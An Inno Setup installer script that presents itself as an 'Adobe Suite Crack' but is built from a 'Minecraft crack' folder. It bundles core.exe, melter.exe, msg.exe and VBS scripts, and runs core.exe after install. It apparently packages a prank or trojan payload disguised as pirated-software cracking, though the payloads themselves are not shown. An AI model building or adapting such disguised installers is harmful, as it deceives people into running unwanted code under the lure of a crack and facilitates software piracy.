; Script generated by the Inno Setup Script Wizard.
; SEE THE DOCUMENTATION FOR DETAILS ON CREATING INNO SETUP SCRIPT FILES!

#define MyAppName "Adobe Suite Crack"
#define MyAppVersion "2.0"
#define MyAppPublisher "Cracking Program Company"
#define MyAppExeName "core.exe"

[Setup]
; NOTE: The value of AppId uniquely identifies this application. Do not use the same AppId value in installers for other applications.
; (To generate a new GUID, click Tools | Generate GUID inside the IDE.)
AppId={{EB05B054-847C-4DF6-9337-BB7548EF7D46}
AppName={#MyAppName}
AppVersion={#MyAppVersion}
;AppVerName={#MyAppName} {#MyAppVersion}
AppPublisher={#MyAppPublisher}
DefaultDirName={autopf}\{#MyAppName}
DefaultGroupName={#MyAppName}
AllowNoIcons=yes
; The [Icons] "quicklaunchicon" entry uses {userappdata} but its [Tasks] entry has a proper IsAdminInstallMode Check.
UsedUserAreasWarning=no
; Uncomment the following line to run in non administrative install mode (install for current user only.)
;PrivilegesRequired=lowest
PrivilegesRequiredOverridesAllowed=dialog
OutputDir=C:\Users\Chaxiraxi\Desktop\Minecraft crack\Source Code
OutputBaseFilename=Adobe Suite Crack Setup
SetupIconFile=C:\Users\Chaxiraxi\Desktop\Minecraft crack\Source Code\icon.ico
Compression=lzma
SolidCompression=yes
WizardStyle=modern

[Languages]
Name: "french"; MessagesFile: "compiler:Languages\French.isl"

[Tasks]
Name: "desktopicon"; Description: "{cm:CreateDesktopIcon}"; GroupDescription: "{cm:AdditionalIcons}"; Flags: unchecked
Name: "quicklaunchicon"; Description: "{cm:CreateQuickLaunchIcon}"; GroupDescription: "{cm:AdditionalIcons}"; Flags: unchecked; OnlyBelowVersion: 6.1; Check: not IsAdminInstallMode

[Files]
Source: "C:\Users\Chaxiraxi\Desktop\Minecraft crack\Source Code\core.exe"; DestDir: "{app}"; Flags: ignoreversion
Source: "C:\Users\Chaxiraxi\Desktop\Minecraft crack\Source Code\melter.exe"; DestDir: "{app}"; Flags: ignoreversion
Source: "C:\Users\Chaxiraxi\Desktop\Minecraft crack\Source Code\msg.exe"; DestDir: "{app}"; Flags: ignoreversion
Source: "C:\Users\Chaxiraxi\Desktop\Minecraft crack\Source Code\msgbox.vbs"; DestDir: "{app}"; Flags: ignoreversion
Source: "C:\Users\Chaxiraxi\Desktop\Minecraft crack\Source Code\song.mp3"; DestDir: "{app}"; Flags: ignoreversion
Source: "C:\Users\Chaxiraxi\Desktop\Minecraft crack\Source Code\song.vbs"; DestDir: "{app}"; Flags: ignoreversion
; NOTE: Don't use "Flags: ignoreversion" on any shared system files

[Icons]
Name: "{group}\{#MyAppName}"; Filename: "{app}\{#MyAppExeName}"
Name: "{group}\{cm:UninstallProgram,{#MyAppName}}"; Filename: "{uninstallexe}"
Name: "{autodesktop}\{#MyAppName}"; Filename: "{app}\{#MyAppExeName}"; Tasks: desktopicon
Name: "{userappdata}\Microsoft\Internet Explorer\Quick Launch\{#MyAppName}"; Filename: "{app}\{#MyAppExeName}"; Tasks: quicklaunchicon

[Run]
Filename: "{app}\{#MyAppExeName}"; Description: "{cm:LaunchProgram,{#StringChange(MyAppName, '&', '&&')}}"; Flags: nowait postinstall skipifsilent

